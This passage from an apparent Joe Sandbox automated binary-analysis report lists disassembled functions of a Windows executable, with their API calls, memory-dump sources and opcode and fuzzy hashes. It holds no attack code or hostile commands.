                                                                                      • Opcode Fuzzy Hash: f8d4cc0807b759bae040f4e628c3548543ccf32e1f9bea8170ea6682bd642638
                                                                                      • Instruction Fuzzy Hash: 1AF022327012287BEA209F51AC85F6BBA5AEF05384F00253AFAC4A61A1D6295C1087AC
                                                                                      Function 0040FCA6 Relevance: 3.0, APIs: 2, Instructions: 33COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetCurrentProcess.KERNEL32(?,?), ref: 0040FCB3
                                                                                      • GetProcessAffinityMask.KERNEL32(00000000), ref: 0040FCBA
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: Process$AffinityCurrentMask
                                                                                      • String ID:
                                                                                      • API String ID: 1231390398-0
                                                                                      • Opcode ID: d5e5721974881215e06106a87625e75a2d5b934da910b34c6a586c97154867f4
                                                                                      • Instruction ID: e44540004bef0ff180d4ab2a2d34042a80d92e83f1297f225e1ed134cfb57ea1
                                                                                      • Opcode Fuzzy Hash: d5e5721974881215e06106a87625e75a2d5b934da910b34c6a586c97154867f4
                                                                                      • Instruction Fuzzy Hash: B5E09B32E1410D67DF2886A49C469EF73ADFA042007244177ED06E3A40F938DD095798
                                                                                      Function 0040A0C3 Relevance: 3.0, APIs: 2, Instructions: 30COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00409EF9,?,?,?,00409D92,?,00000001,00000000,?,?), ref: 0040A0D7
                                                                                      • SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00409EF9,?,?,?,00409D92,?,00000001,00000000,?,?), ref: 0040A108
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: AttributesFile
                                                                                      • String ID:
                                                                                      • API String ID: 3188754299-0
                                                                                      • Opcode ID: 49067b66027d72ea7aec8980449df9622f8b8ba00028e4d55bcd0deb3ad8bd9a
                                                                                      • Instruction ID: 3d018187d10b2f6eececaaf53ef1bdc2879b5b7f737befbb89de33a98e18d5a9
                                                                                      • Opcode Fuzzy Hash: 49067b66027d72ea7aec8980449df9622f8b8ba00028e4d55bcd0deb3ad8bd9a
                                                                                      • Instruction Fuzzy Hash: 85F0A031280209ABDF115F61EC05BDA776DEB05385F048076BD889A1A1DB36CAA89A98
                                                                                      Function 0041C0D0 Relevance: 3.0, APIs: 2, Instructions: 29COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: ItemText_swprintf
                                                                                      • String ID:
                                                                                      • API String ID: 3011073432-0
                                                                                      • Opcode ID: f1e2b7e74785062605be7e7d32c71690a797ae2cd2e6f1faaa61cc2cafe0828f
                                                                                      • Instruction ID: 9de61da28c5e0a7fbd85b47d52f98c1448f14b6fa6955f6a100a5f5ae7362b7a
                                                                                      • Opcode Fuzzy Hash: f1e2b7e74785062605be7e7d32c71690a797ae2cd2e6f1faaa61cc2cafe0828f
                                                                                      • Instruction Fuzzy Hash: A9F05C3299430CF6E711BBE18C06FDA3F5DA704346F00006BB701A20E2D6B55EA0935E
                                                                                      Function 00409DAC Relevance: 3.0, APIs: 2, Instructions: 28fileCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • DeleteFileW.KERNELBASE(?,?,?,00409611,?,?,0040946C), ref: 00409DBD
                                                                                      • DeleteFileW.KERNEL32(?,?,?,00000800,?,?,00409611,?,?,0040946C), ref: 00409DEB
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: DeleteFile
                                                                                      • String ID:
                                                                                      • API String ID: 4033686569-0
                                                                                      • Opcode ID: d20c1e410623cec59bb51d04dffb52da469d3a5ed4fbc6d2059cd8998daa578d
                                                                                      • Instruction ID: ba18e7a2190bd508ead41dc30a5c542f6a576b79b821afc7d9ed0bc41cc22f24
                                                                                      • Opcode Fuzzy Hash: d20c1e410623cec59bb51d04dffb52da469d3a5ed4fbc6d2059cd8998daa578d
                                                                                      • Instruction Fuzzy Hash: 9EE0223168020D6BDB109F61EC41FEA77ADEF09382F840076BD88D2190DB31CC90AA9C
                                                                                      Function 00409E13 Relevance: 3.0, APIs: 2, Instructions: 26COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetFileAttributesW.KERNELBASE(?,?,?,00409E08,?,004075A0,?,?,?,?), ref: 00409E24
                                                                                      • GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,00409E08,?,004075A0,?,?,?,?), ref: 00409E50
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: AttributesFile
                                                                                      • String ID:
                                                                                      • API String ID: 3188754299-0
                                                                                      • Opcode ID: 4609e21ca204fae76a4fe64b3a18e7cd7223f2b6f9f4b1a96e2e533661862c7e
                                                                                      • Instruction ID: 6cb531cace8c601102c0547e3fd22b9cca56d617da4427f97a6c15f5870cd73f
                                                                                      • Opcode Fuzzy Hash: 4609e21ca204fae76a4fe64b3a18e7cd7223f2b6f9f4b1a96e2e533661862c7e
                                                                                      • Instruction Fuzzy Hash: 74E09B3250025857CB50AB68DC45BDA776CDB097E2F0002B6FD48F32D1D7749D848BD8
                                                                                      Function 0040F309 Relevance: 3.0, APIs: 2, Instructions: 25libraryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetSystemDirectoryW.KERNEL32(?,00000800), ref: 0040F324
                                                                                      • LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0040DEC8,Crypt32.dll,?,0040DF4A,?,0040DF2E,?,?,?,?), ref: 0040F346
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: DirectoryLibraryLoadSystem
                                                                                      • String ID:
                                                                                      • API String ID: 1175261203-0
                                                                                      • Opcode ID: 3cf9d30d0600b657c2fda4a18d578511dd1da80d67c4436d11950088fa62c76c
                                                                                      • Instruction ID: bc06febe091f81de48ca509c123cfcb13b0c613048c2f1cbedbdbe178124ed14
                                                                                      • Opcode Fuzzy Hash: 3cf9d30d0600b657c2fda4a18d578511dd1da80d67c4436d11950088fa62c76c
                                                                                      • Instruction Fuzzy Hash: 43E0927280111867CB10AAA49C05FDB77ACEB093D2F0000B6B948D3000DA74A9808BF8
                                                                                      Function 00418924 Relevance: 3.0, APIs: 2, Instructions: 24windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00418945
                                                                                      • GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 0041894C
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: BitmapCreateFromGdipStream
                                                                                      • String ID:
                                                                                      • API String ID: 1918208029-0
                                                                                      • Opcode ID: 83e8ab2c3678110c70598f4420753996258dee5e195a48e69632c60748c1abc6
                                                                                      • Instruction ID: 89909624a1b8d7dd554cd9a95016278948d52b92a248ea3f840241418157bd5f
                                                                                      • Opcode Fuzzy Hash: 83e8ab2c3678110c70598f4420753996258dee5e195a48e69632c60748c1abc6
                                                                                      • Instruction Fuzzy Hash: FDE06DB1810208EFCB10DF89D9017EABBE8EB08321F10806FE84593300D674AE40DB96
                                                                                      Function 0041909E Relevance: 3.0, APIs: 2, Instructions: 22COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GdiplusShutdown.GDIPLUS(?,?,?,0042F79B,000000FF), ref: 004190C7
                                                                                      • CoUninitialize.COMBASE(?,?,?,0042F79B,000000FF), ref: 004190CC
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: GdiplusShutdownUninitialize
                                                                                      • String ID:
                                                                                      • API String ID: 3856339756-0
                                                                                      • Opcode ID: 1a113437c3dceedd185b35e629c1f1cc6fa90962aca71ec5f45e9c548eb947e1
                                                                                      • Instruction ID: 71d730d636b1eafa09d85fd1c61fbc0685fd2fc5adc72f2c45a79fa5be33e515
                                                                                      • Opcode Fuzzy Hash: 1a113437c3dceedd185b35e629c1f1cc6fa90962aca71ec5f45e9c548eb947e1
                                                                                      • Instruction Fuzzy Hash: 9DE09A325446409FC320DB4CED42B41BBE8FB48B20F00477AB91A83B60CB386800CA89
                                                                                      Function 00420CA6 Relevance: 3.0, APIs: 2, Instructions: 19COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 00421D9A: try_get_function.LIBVCRUNTIME ref: 00421DAF
                                                                                      • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00420CC4
                                                                                      • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00420CCF
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: Value___vcrt____vcrt_uninitialize_ptdtry_get_function
                                                                                      • String ID:
                                                                                      • API String ID: 806969131-0
                                                                                      • Opcode ID: ef8e873735e95fed888e10da15b201cb461dba3b003466459fe902653cd25241
                                                                                      • Instruction ID: 15caed91783df683f99fb8f094fa9a6145b1dbf3dfca54a1ececafe1adfc8d0f
                                                                                      • Opcode Fuzzy Hash: ef8e873735e95fed888e10da15b201cb461dba3b003466459fe902653cd25241
                                                                                      • Instruction Fuzzy Hash: 7AD0A7F5758331141D0C33B3381255B13C454127787F0035BE421D92D3DE1C5042611E
                                                                                      Function 004012C2 Relevance: 3.0, APIs: 2, Instructions: 11COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: ItemShowWindow
                                                                                      • String ID:
                                                                                      • API String ID: 3351165006-0
                                                                                      • Opcode ID: 7eb1bced1337abe4103a1157b4a187fb77b639d4734a93acfd8a3413decf6958
                                                                                      • Instruction ID: d792881a060d92373ae39c6337ab342845706df2588c462b1a42653d7ebf7be4
                                                                                      • Opcode Fuzzy Hash: 7eb1bced1337abe4103a1157b4a187fb77b639d4734a93acfd8a3413decf6958
                                                                                      • Instruction Fuzzy Hash: 72C01232098200BFCB010BB0DC09C2EFBAAABA5212F20C928B6E5C00A0C238C020DB12
                                                                                      Function 0040FC30 Relevance: 2.5, APIs: 2, Instructions: 46COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • EnterCriticalSection.KERNEL32(00441E74,?,?,?,?,0040A5A0,?,?,?,?,0042F79B,000000FF), ref: 0040FC42
                                                                                      • LeaveCriticalSection.KERNEL32(00441E74,?,?,?,?,0040A5A0,?,?,?,?,0042F79B,000000FF), ref: 0040FC99
                                                                                        • Part of subcall function 0040F9D1: ReleaseSemaphore.KERNEL32(?,00000020,00000000), ref: 0040FA05
                                                                                        • Part of subcall function 0040F9D1: CloseHandle.KERNEL32(?,?), ref: 0040FA1F
                                                                                        • Part of subcall function 0040F9D1: DeleteCriticalSection.KERNEL32(?), ref: 0040FA38
                                                                                        • Part of subcall function 0040F9D1: CloseHandle.KERNELBASE(?), ref: 0040FA44
                                                                                        • Part of subcall function 0040F9D1: CloseHandle.KERNEL32(?), ref: 0040FA50
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseCriticalHandleSection$DeleteEnterLeaveReleaseSemaphore
                                                                                      • String ID:
                                                                                      • API String ID: 3265325312-0
                                                                                      • Opcode ID: 3d73b8c6b70c587057ebc9472dd2178444a0a940b11fece28bb1d6c740ae0257
                                                                                      • Instruction ID: 2748a0d4e6f45fa9011fb6d9c5293fb652b77cacbfa0c35249efcb2e4070ce24
                                                                                      • Opcode Fuzzy Hash: 3d73b8c6b70c587057ebc9472dd2178444a0a940b11fece28bb1d6c740ae0257
                                                                                      • Instruction Fuzzy Hash: C3F0A93A20911557F6255725FC815BB771CE786754365013BEC0077691DB39AC85429C
                                                                                      Function 004019B1 Relevance: 1.8, APIs: 1, Instructions: 275COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: H_prolog
                                                                                      • String ID:
                                                                                      • API String ID: 3519838083-0
                                                                                      • Opcode ID: 285631b1b0c65b916d3c9a88c354c3c221e577263a21b42a6b5f527a26ae530a
                                                                                      • Instruction ID: 19141e072dab73dcc3572f4339a5afe144b5496673689a5a44c0944b25724033
                                                                                      • Opcode Fuzzy Hash: 285631b1b0c65b916d3c9a88c354c3c221e577263a21b42a6b5f527a26ae530a
                                                                                      • Instruction Fuzzy Hash: 72B1D270B04246AFEB19CF78C484BBAFBA6BF05304F14426BE455A73E1C739A854CB95
                                                                                      Function 0040820B Relevance: 1.6, APIs: 1, Instructions: 110COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • __EH_prolog.LIBCMT ref: 00408210
                                                                                        • Part of subcall function 0040137E: __EH_prolog.LIBCMT ref: 00401383
                                                                                        • Part of subcall function 0040137E: new.LIBCMT ref: 004013FB
                                                                                        • Part of subcall function 004019B1: __EH_prolog.LIBCMT ref: 004019B6
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: H_prolog
                                                                                      • String ID:
                                                                                      • API String ID: 3519838083-0
                                                                                      • Opcode ID: f9c2be3d579ec6f290cdb459ac7279ea005a694db48485277e0f59e9ca1c6c7b
                                                                                      • Instruction ID: a7233a5628e09521f1cece0212116d0ff4ec9e4d6cbde432020bc2fa4a5023b9
                                                                                      • Opcode Fuzzy Hash: f9c2be3d579ec6f290cdb459ac7279ea005a694db48485277e0f59e9ca1c6c7b
                                                                                      • Instruction Fuzzy Hash: 204190719406589ADB20EB61C951BEA7369AF50304F0404FFE88AB31D2DB795EC8DB58
                                                                                      Function 004121E6 Relevance: 1.6, APIs: 1, Instructions: 90COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: H_prolog
                                                                                      • String ID:
                                                                                      • API String ID: 3519838083-0
                                                                                      • Opcode ID: 2fcbfc317dfbf10471264666eef0093091f208406ba4f47b14d2de787e0977e4
                                                                                      • Instruction ID: 25bbb2e8f0e42c0b7e8c382d47ef6a91aee6378ea54e43766ca48c0b8cf0a1a7
                                                                                      • Opcode Fuzzy Hash: 2fcbfc317dfbf10471264666eef0093091f208406ba4f47b14d2de787e0977e4
                                                                                      • Instruction Fuzzy Hash: B5212BB1E40215ABDB14DF75DD8169B7668FB04318F00027FE505EB681D7B89D90C6AC
                                                                                      Function 00419485 Relevance: 1.6, APIs: 1, Instructions: 71COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • __EH_prolog.LIBCMT ref: 0041948A
                                                                                        • Part of subcall function 0040137E: __EH_prolog.LIBCMT ref: 00401383
                                                                                        • Part of subcall function 0040137E: new.LIBCMT ref: 004013FB
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: H_prolog
                                                                                      • String ID:
                                                                                      • API String ID: 3519838083-0
                                                                                      • Opcode ID: 36c59da9c833b94dabac1adde38a362c4c8355df08b092d4c4c27ce063129fac
                                                                                      • Instruction ID: 338ad484b94d2a1bfdfb7d24a0c6a38a9346a04e08d485367f6443635e10297b
                                                                                      • Opcode Fuzzy Hash: 36c59da9c833b94dabac1adde38a362c4c8355df08b092d4c4c27ce063129fac
                                                                                      • Instruction Fuzzy Hash: FC21AD72C04259AACF10DF95D9919EEBBF4AF19304F0004AFE809B7242D7396E45CB68
                                                                                      Function 004090D0 Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: H_prolog
                                                                                      • String ID:
                                                                                      • API String ID: 3519838083-0
                                                                                      • Opcode ID: de37ac89b4206785297ad8f1d148077ab8d571d1ea5b384f26eea3ae42d97232
                                                                                      • Instruction ID: 5bb6ce7756625e4e1c417dd1aa3cf217b87c06ccb5af829f4c775dd188fbde66
                                                                                      • Opcode Fuzzy Hash: de37ac89b4206785297ad8f1d148077ab8d571d1ea5b384f26eea3ae42d97232
                                                                                      • Instruction Fuzzy Hash: 59118673A40529ABDF11AF59CC959DEB735AF88744F00453BFC157B292CA399C0087E8
                                                                                      Function 00428EE4 Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 00425A8D: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,0042634D,00000001,00000364,?,00422213,?,?,0043CBE8), ref: 00425ACE
                                                                                      • _free.LIBCMT ref: 00428F50
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
